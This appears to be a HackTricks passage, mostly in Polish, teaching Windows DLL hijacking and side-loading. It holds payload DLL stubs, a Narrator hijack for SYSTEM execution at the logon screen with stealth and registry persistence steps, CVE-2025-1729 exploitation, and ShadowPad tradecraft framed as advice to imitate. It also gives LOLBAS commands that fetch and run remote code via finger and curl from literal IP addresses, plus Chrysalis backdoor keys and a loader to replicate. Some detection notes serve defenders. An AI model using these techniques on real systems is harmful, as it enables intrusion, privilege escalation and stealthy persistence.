#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## Studium przypadku: Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe nadal sprawdza przewidywalny, specyficzny dla języka lokalizacyjny plik DLL podczas uruchamiania, który może zostać przejęty (DLL Hijack) w celu wykonania dowolnego kodu i utrzymania dostępu.

Kluczowe informacje
- Ścieżka sprawdzania (aktualne wersje): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Ścieżka legacy (starsze wersje): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- Jeśli w ścieżce OneCore znajduje się zapisywalny plik DLL kontrolowany przez atakującego, zostaje on załadowany, a `DllMain(DLL_PROCESS_ATTACH)` zostaje wykonany. Nie są wymagane żadne eksporty.

Wykrywanie za pomocą Procmon
- Filtr: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Uruchom Narrator i obserwuj próbę załadowania powyższej ścieżki.

Minimalny plik DLL
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC silence

• A naive hijack will speak/highlight UI. To stay quiet, on attach enumerate Narrator threads, open the main thread (OpenThread(THREAD_SUSPEND_RESUME)) and SuspendThread it; continue in your own thread. See PoC for full code.

Trigger and persistence via Accessibility configuration

• User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• With the above, starting Narrator loads the planted DLL. On the secure desktop (logon screen), press CTRL+WIN+ENTER to start Narrator; your DLL executes as SYSTEM on the secure desktop.

RDP-triggered SYSTEM execution (lateral movement)

• Allow classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• RDP to the host, at the logon screen press CTRL+WIN+ENTER to launch Narrator; your DLL executes as SYSTEM on the secure desktop.
• Execution stops when the RDP session closes—inject/migrate promptly.

Bring Your Own Accessibility (BYOA)

• You can clone a built-in Accessibility Tool (AT) registry entry (e.g., CursorIndicator), edit it to point to an arbitrary binary/DLL, import it, then set configuration to that AT name. This proxies arbitrary execution under the Accessibility framework.

Notes

• Writing under %windir%\System32 and changing HKLM values requires admin rights.
• All payload logic can live in DLL_PROCESS_ATTACH; no exports are needed.

Case Study: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

This case demonstrates Phantom DLL Hijacking in Lenovo’s TrackPoint Quick Menu (TPQMAssistant.exe), tracked as CVE-2025-1729.

Vulnerability Details

• Component: TPQMAssistant.exe located at C:\ProgramData\Lenovo\TPQM\Assistant\.
• Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask runs daily at 9:30 AM under the context of the logged-on user.
• Directory Permissions: Writable by CREATOR OWNER, allowing local users to drop arbitrary files.
• DLL Search Behavior: Attempts to load hostfxr.dll from its working directory first and logs “NAME NOT FOUND” if missing, indicating local directory search precedence.

Exploit Implementation

An attacker can place a malicious hostfxr.dll stub in the same directory, exploiting the missing DLL to achieve code execution under the user’s context:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Przebieg ataku

1. Jako standardowy użytkownik upuść hostfxr.dll do C:\ProgramData\Lenovo\TPQM\Assistant\.
2. Poczekaj, aż zadanie zaplanowane uruchomi się o 9:30 pod kontekstem bieżącego użytkownika.
3. Jeśli administrator jest zalogowany w momencie wykonania zadania, złośliwy DLL uruchamia się w sesji administratora na poziomie medium integrity.
4. Chain standard UAC bypass techniques, aby podnieść uprawnienia z medium integrity do SYSTEM.

Studium przypadku: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Threat actors frequently pair MSI-based droppers with DLL side-loading to execute payloads under a trusted, signed process.

Przegląd łańcucha

• User downloads MSI. A CustomAction runs silently during the GUI install (e.g., LaunchApplication or a VBScript action), reconstructing the next stage from embedded resources.
• The dropper writes a legitimate, signed EXE and a malicious DLL to the same directory (example pair: Avast-signed wsc_proxy.exe + attacker-controlled wsc.dll).
• When the signed EXE is started, Windows DLL search order loads wsc.dll from the working directory first, executing attacker code under a signed parent (ATT&CK T1574.001).

MSI analysis (what to look for)

• CustomAction table:
• Look for entries that run executables or VBScript. Example suspicious pattern: LaunchApplication executing an embedded file in background.
• In Orca (Microsoft Orca.exe), inspect CustomAction, InstallExecuteSequence and Binary tables.
• Embedded/split payloads in the MSI CAB:
• Administrative extract: msiexec /a package.msi /qb TARGETDIR=C:\out
• Or use lessmsi: lessmsi x package.msi C:\out
• Look for multiple small fragments that are concatenated and decrypted by a VBScript CustomAction. Common flow:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

Praktyczne sideloading z wsc_proxy.exe

• Umieść te dwa pliki w tym samym folderze:
• wsc_proxy.exe: legalnie podpisany host (Avast). Proces próbuje załadować wsc.dll po nazwie z jego katalogu.
• wsc.dll: attacker DLL. Jeśli nie są wymagane żadne specyficzne exports, DllMain może wystarczyć; w przeciwnym razie zbuduj proxy DLL i przekaż wymagane exports do genuine library, uruchamiając payload w DllMain.
• Zbuduj minimalny payload w formie DLL:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• Dla wymagań eksportu użyj frameworka proxy (np. DLLirant/Spartacus), aby wygenerować forwarding DLL, która także wykonuje twój payload.

• Ta technika opiera się na rozwiązywaniu nazw DLL przez plik binarny hosta. Jeśli host używa ścieżek bezwzględnych lub bezpiecznych flag ładowania (np. LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories), hijack może się nie powieść.

• KnownDLLs, SxS oraz forwarded exports mogą wpływać na priorytety i należy je brać pod uwagę przy wyborze pliku binarnego hosta oraz zestawu eksportów.

Podpisane triady + zaszyfrowane payloady (studium przypadku ShadowPad)

Check Point opisał, jak Ink Dragon wdraża ShadowPad używając triady składającej się z trzech plików, aby zlewać się z legalnym oprogramowaniem, jednocześnie trzymając główny payload zaszyfrowany na dysku:

1. Signed host EXE – dostawcy tacy jak AMD, Realtek, czy NVIDIA są nadużywani (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). Atakujący zmieniają nazwę pliku wykonywalnego, żeby wyglądał jak binarka Windows (np. conhost.exe), ale podpis Authenticode pozostaje ważny.
2. Malicious loader DLL – upuszczana obok EXE z oczekiwaną nazwą (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). DLL zwykle jest binarką MFC zniekształconą przy użyciu frameworka ScatterBrain; jej jedynym zadaniem jest zlokalizować zaszyfrowany blob, odszyfrować go i reflectively map ShadowPad.
3. Encrypted payload blob – często przechowywany jako <name>.tmp w tym samym katalogu. Po zamapowaniu w pamięci odszyfrowanego payloadu, loader usuwa plik TMP, aby zniszczyć dowody śledcze.

Tradecraft notes:

• Zmienianie nazwy podpisanego EXE (przy zachowaniu oryginalnego OriginalFileName w nagłówku PE) pozwala mu podszywać się pod binarkę Windows, zachowując jednocześnie podpis dostawcy; dlatego naśladuj praktykę Ink Dragon polegającą na upuszczaniu binarek wyglądających jak conhost.exe, które w rzeczywistości są narzędziami AMD/NVIDIA.
• Ponieważ wykonywalny plik pozostaje zaufany, większość mechanizmów allowlistingu wymaga tylko, aby twoja złośliwa DLL znajdowała się obok niego. Skoncentruj się na dostosowaniu loader DLL; podpisany rodzic zwykle może działać bez zmian.
• ShadowPad’s decryptor oczekuje, że blob TMP będzie znajdował się obok loadera i będzie zapisywalny, aby mógł wyzerować plik po zamapowaniu. Zachowaj katalog jako zapisywalny dopóki payload się ładuje; po załadowaniu do pamięci plik TMP można bezpiecznie usunąć dla OPSEC.

LOLBAS stager + staged archive sideloading chain (finger → tar/curl → WMI)

Operatorzy łączą DLL sideloading z LOLBAS, więc jedynym niestandardowym artefaktem na dysku jest złośliwa DLL obok zaufanego EXE:

• Remote command loader (Finger): Ukryty PowerShell uruchamia cmd.exe /c, pobiera polecenia z serwera Finger i przekazuje je do cmd:

powershell.exe Start-Process cmd -ArgumentList '/c finger Galo@91.193.19.108 | cmd' -WindowStyle Hidden

• finger user@host pobiera TCP/79 tekst; | cmd wykonuje odpowiedź serwera, pozwalając operatorom rotować drugą fazę po stronie serwera.

• Built-in download/extract: Pobierz archiwum z łagodnym rozszerzeniem, rozpakuj je i przygotuj cel sideload oraz DLL w losowym folderze %LocalAppData%:

$base = "$Env:LocalAppData"; $dir = Join-Path $base (Get-Random); curl -s -L -o "$dir.pdf" 79.141.172.212/tcp; mkdir "$dir"; tar -xf "$dir.pdf" -C "$dir"; $exe = "$dir\intelbq.exe"

• curl -s -L ukrywa postęp i podąża za przekierowaniami; tar -xf używa wbudowanego tar w Windows.

• WMI/CIM launch: Uruchom EXE przez WMI, aby telemetria pokazywała proces utworzony przez CIM, podczas gdy ładuje współlokowaną DLL:

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "`"$exe`""}

• Działa z binarkami, które preferują lokalne DLL (np. intelbq.exe, nearby_share.exe); payload (np. Remcos) działa pod zaufaną nazwą.

• Hunting: Generuj alert na forfiles, gdy /p, /m i /c pojawiają się razem; rzadkie poza skryptami administracyjnymi.

Studium przypadku: NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

Niedawne włamanie Lotus Blossom wykorzystało zaufany łańcuch aktualizacji, aby dostarczyć droppera opakowanego NSIS, który przygotował DLL sideload oraz w pełni pamięciowe payloady.

Przebieg operacyjny

• update.exe (NSIS) tworzy %AppData%\Bluetooth, ustawia ją jako HIDDEN, upuszcza przemianowany Bitdefender Submission Wizard BluetoothService.exe, złośliwy log.dll oraz zaszyfrowany blob BluetoothService, a następnie uruchamia EXE.
• Host EXE importuje log.dll i wywołuje LogInit/LogWrite. LogInit ładuje blob przez mmap; LogWrite odszyfrowuje go customowym strumieniem opartym na LCG (stałe 0x19660D / 0x3C6EF35F, materiał klucza pochodzący z poprzedniego hasha), nadpisuje bufor plaintextowym shellcodem, zwalnia tymczasowe zasoby i skacze do niego.
• Aby uniknąć IAT, loader rozwiązuje API poprzez hashowanie nazw eksportów używając FNV-1a basis 0x811C9DC5 + prime 0x1000193, następnie stosując mieszanie w stylu Murmur (0x85EBCA6B) i porównując z solonymi docelowymi hashami.

Główny shellcode (Chrysalis)

• Odszyfrowuje główny moduł przypominający PE przez powtarzanie add/XOR/sub z kluczem gQ2JR&9; przez pięć przebiegów, następnie dynamicznie ładuje Kernel32.dll → GetProcAddress, aby zakończyć rozwiązywanie importów.
• Rekonstruuje ciągi nazw DLL w czasie wykonywania przez per-znakowe transformacje bit-rotate/XOR, potem ładuje oleaut32, advapi32, shlwapi, user32, wininet, ole32, shell32.
• Używa drugiego resolvera, który przechodzi przez PEB → InMemoryOrderModuleList, parsuje każdą tabelę eksportów w blokach 4-bajtowych z mieszaniem w stylu Murmur, i tylko w przypadku braku hasha cofa się do GetProcAddress.

Wbudowana konfiguracja & C2

• Konfiguracja znajduje się wewnątrz upuszczonego pliku BluetoothService na offset 0x30808 (rozmiar 0x980) i jest odszyfrowana RC4 z kluczem qwhvb^435h&*7, ujawniając URL C2 i User-Agent.
• Beacony tworzą profil hosta rozdzielany kropkami, poprzedzają tagiem 4Q, następnie szyfrują RC4 kluczem vAuig34%^325hGV przed wywołaniem HttpSendRequestA przez HTTPS. Odpowiedzi są odszyfrowywane RC4 i rozdzielane przez switch tagów (4T shell, 4V exec procesu, 4W/4X zapis pliku, 4Y odczyt/eksfiltracja, 4\\ uninstall, 4 enumeracja dysków/plików + przypadki transferu w kawałkach).
• Tryb wykonania jest sterowany argumentami CLI: brak argumentów = instalacja persistence (service/Run key) wskazująca na -i; -i ponownie uruchamia się z -k; -k pomija instalację i uruchamia payload.

Zaobserwowany alternatywny loader

• To samo włamanie upuściło Tiny C Compiler i wykonało svchost.exe -nostdlib -run conf.c z C:\ProgramData\USOShared\, z libtcc.dll obok. Dostarczone przez atakującego źródło C osadzało shellcode, kompilowało go i uruchamiało w pamięci bez zapisu PE na dysku. Zreplikuj z:

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• Ta faza TCC-based compile-and-run zaimportowała Wininet.dll podczas wykonywania i pobrała second-stage shellcode z hardcoded URL, zapewniając elastyczny loader, który podszywa się pod uruchomienie kompilatora.

References

• Red Canary – Intelligence Insights: January 2026
• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
• 0xdf – HTB Bruno ZipSlip → DLL hijack chain

Tip

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Ucz się i ćwicz Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Wsparcie dla HackTricks

• Sprawdź plany subskrypcyjne!
• Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
• Dziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.